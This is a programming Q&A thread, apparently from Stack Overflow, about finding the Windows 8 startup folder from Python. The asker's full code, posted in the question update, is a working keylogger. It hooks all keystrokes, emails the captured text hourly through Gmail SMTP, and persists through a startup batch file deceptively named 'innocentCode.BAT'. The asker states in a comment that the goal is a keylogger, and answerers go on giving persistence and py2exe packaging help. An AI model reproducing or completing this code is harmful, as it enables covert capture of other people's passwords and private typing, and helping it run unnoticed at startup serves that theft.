# Find startup folder in windows 8 using python

Tags: python, windows, pywin32

I have a code that adds a batch file to the startup folder so that it runs when the computer starts up.
my code is the following:

```
path = 'C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Batch.BAT' %win32api.GetUserName()
f = open(path, 'w')
```

This works just fine on Win 7 but in Win8 the startup folder was moved and I can't find access to it.
How do I find the right folder to put it in?
Thank you
Isaac

**UPDATE: My code works and runs when it is in .pyw but once I turn it to .exe it doesn't... This I don't understand**

Full code:

```
import win32api
import sys
import pythoncom, pyHook
import time
import smtplib
import thread
import re
import os

global text
global start
def main():
global text
global start
text = ''
start = time.time()
AddToStartUp(fixpath(findDirectory()))
while True:
    hm = pyHook.HookManager() 
    hm.KeyDown = OnKeyboardEvent 
    hm.HookKeyboard() 
    pythoncom.PumpMessages()

def sendemail(from_addr, to_addr_list, cc_addr_list,
          subject, message,
          login, password,
          smtpserver='smtp.gmail.com:587'):
header  = 'From: %s\n' % from_addr
header += 'To: %s\n' % ','.join(to_addr_list)
header += 'Cc: %s\n' % ','.join(cc_addr_list)
header += 'Subject: %s\n\n' % subject
message = header + message

server = smtplib.SMTP(smtpserver)
server.starttls()
server.login(login,password)

problems = server.sendmail(from_addr, to_addr_list, message)
server.quit()
return problems


def OnKeyboardEvent(event):
global start
global text
text += chr(event.Ascii)
print text
if time.time()-start > 3600:
    thread.start_new_thread(sendemail, ('email','email','','Keylogger',text,'email','password'))
    start = time.time()
return True
def fixpath(path):
arr = re.split(r'\\', path)
direct = ''
for i in arr:
    direct += i + '\\'
return direct

def AddToStartUp(direct):
path = 'C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\innocentCode.BAT' %win32api.GetUserName()
f = open(path, 'w')
f.write("""cd %s\nstart keylogger\nexit"""%direct)

def findDirectory():
return os.path.dirname(os.path.realpath(__file__))

if __name__ == "__main__":
main()
```

Comment: As a related note, you should not assume that the profile directory is in `C:\Users`. Use an environment variable like `%USERPROFILE%` or `%APPDATA%`.

Comment: There are APIs in Windows to get this information. Check the Python libs for exposure of such OS information.

Comment: Can you please give me a code example? I am quite new to python and don't know how I work with them

Answer (score 4):

I personally like to use PyWin32 and Tim Golden's [winshell module](http://winshell.readthedocs.org/en/latest/special-folders.html). This allows you to do something like this to get the startup folder:

```
import winshell

startup = winshell.startup()
```

The `winshell` module also provides paths for many other common locations, such as the desktop, start menu, favorites, etc. It can also create shortcuts and work with the Recycle Bin.

Comment: Thank you, I will try this tomorrow since I dont have access to a Win8 PC anymore.

Answer (score 1):

The following code shows how to find it via the win32 api. I once found it searching the web - no credits for me.

```
from win32com.shell import shell, shellcon

def startupdirectory():
    return shell.SHGetFolderPath(
        0,
        shellcon.CSIDL_COMMON_STARTUP,
        0,# null access token (no impersonation)
        0 # want current value, shellcon.SHGFP_TYPE_CURRENT isn't available, this seems to work
        )

if __name__ == '__main__':
    print startupdirectory()
```

Comment: This will return the startup folder's directory?

Comment: Wow, I misread your question. It returns the user's appdata folder. I will investigate and come back.

Comment: @Isaac1492 I changed the code. It was just about finding the apropriate constant.

Comment: You may also want to have a look at the winpath module: http://ginstrom.com/code/winpaths.html

Answer (score 1):

```
from win32com.shell import shell, shellcon

def get_startup_directory(common):
    """
    Copyright Tim Golden <winshell@timgolden.me.uk> 25th November 2003 - 2012
    Licensed under the (GPL-compatible) MIT License:
    http://www.opensource.org/licenses/mit-license.php
    """
    return shell.SHGetFolderPath(0, (shellcon.CSIDL_STARTUP, shellcon.CSIDL_COMMON_STARTUP)[common], None, 0)

get_startup_directory(0) # 'C:\\Users\\<USERNAME>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'
get_startup_directory(1) # 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'
```

Comment: Please, provide some explanation to your answer for future users.

Answer (score 0):

This code works in all Windows versions which not Python external lib.

```
    import win32api, win32con
    objShell = win32com.client.Dispatch("WScript.Shell")       
    startupFlder = objShell.SpecialFolders("Startup")
```

Comment: win32con or win32com which one? And both doesnt have a client in python3

Comment: this is the right answer but it should be `win32com` api.

Answer (score -1):

I read [this article](http://www.thewindowsclub.com/startup-folder-in-windows-8) and got the following information.

The Current Users Startup folder in Windows 8 is located at:

```
C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```

These programs start up for the current logged in user only. To directly access this folder, open Run, type `shell:startup` and hit Enter.

The All Users Windows 8 startup folder is located at:

```
 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```

These programs start up for all users. To open this folder, bring up the Run box, type `shell:common startup` and hit Enter.

**Code:** This code simply retrieves the user name and then adds it to the path. Later it checks if the path really exists and if it exists it prints `Path Exists!`.

```
import getpass
import os.path
userName = getpass.getuser()
file_path= 'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Batch.BAT' %userName
if os.path.exists(file_path):
      print 'Path Exists!'
```

The following code shall work for creating the executable. You have to enter your python file name instead of `filename.py` in the following code. If you are creating a GUI app then simply replace this line `console=['filename.py'],` with `windows=['filename.py'],`

**setup.py**

```
from distutils.core import setup
import py2exe

dll_excludes = ['OLEAUT32.dll','USER32.dll','COMCTL32.dll','SHELL32.dll',
                'ole32.dll','MSVCP90.dll','WINMM.dll','WSOCK32.dll',
                'COMDLG32.dll','ADVAPI32.dll','NETAPI32.dll','WS2_32.dll',
                'WINSPOOL.DRV','GDI32.dll','RPCRT4.dll','VERSION.dll',
                'KERNEL32.dll','ntdll.dll']

setup (
    name='Test',
    description="Script to test py2exe for packaging",
    version="0.1",
    console=['filename.py'],#Enter the python file name here
    platforms=["windows"],
    options={ 'py2exe': {
            'packages': 'encodings',
            "excludes": dll_excludes,
            }
        },
    )
```

Comment: So why doesn't my code work, instead of using get pass I use win32api.GetUserName() and do the same code. If the path is the same path why does it crash for me?

Comment: Can you please put the entire code that you are using including the import statements? Your code work fine on my machine running python v2.7 on Windows 7 OS.

Comment: UPDATE: My code works and runs when it is in .pyw but once I turn it to .exe it doesn't...
This I don't understand

Comment: I'll recommend you to edit your question (better is to write a new one). Mention your problem in detail, including the code snippet that you used. You have to show the code you used for creating an exe. I use py2exe and it works like charm.

Comment: I used py2exe with normal setup(windows=['name']) setup code

Comment: Are you creating a GUI app or a console app?

Comment: It still doesn't work, Im trying to create a keylogger. Ill add the full code in the question
one momen

Comment: I saw ur code. You are creating a console app. So the code for executable that I provided should work. Just take care about the `dll_excludes`. If it doesn't work then please provide a complete stack trace/error log when you created the exe. Else it would not be possible for me (others) to help you. Also are your sure that your python code works fine? Test everything and let us  know what you tested and how you tested and what worked and what unfortunately didn't work. :)

Comment: It doesn't work because it simply doesn't create the batch file and when i look for it in the task manager I cant find it. When I run it using py it works just fine

Comment: py2exe will create an .EXE file not a batch file. Then you have to put this .EXE in the startup folder.

Comment: Can't create an EXE that creates a Batch?

Comment: There is no error log, I tried saving it as .py instead of .pyw and when I run it it opens a console, yet when I turn it to exe it opens a console and immediately crashes. Without saving the batch or running the key ogger

Comment: Try executing the .EXE as administrator. Also are you really sure that your python programme is executing without any errors?

Comment: I'll try and answer you. The program works flawlessly

Comment: Only for english windows, not valid in other languages